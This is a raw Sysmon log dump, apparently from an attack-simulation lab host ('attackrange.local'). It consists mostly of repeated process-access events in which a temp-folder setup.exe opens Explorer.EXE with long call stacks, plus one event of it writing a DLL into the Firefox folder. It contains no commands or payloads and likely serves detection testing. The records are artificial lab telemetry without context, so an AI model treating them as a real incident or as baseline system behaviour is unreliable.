13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015519Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015518Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015517Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015516Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015515Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015514Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000015513Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\vcruntime140.dll2021-01-18 13:59:52.583 10341000x800000000000000015512Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015511Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015510Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015509Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015508Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015507Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015506Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015505Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015504Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015503Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015502Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 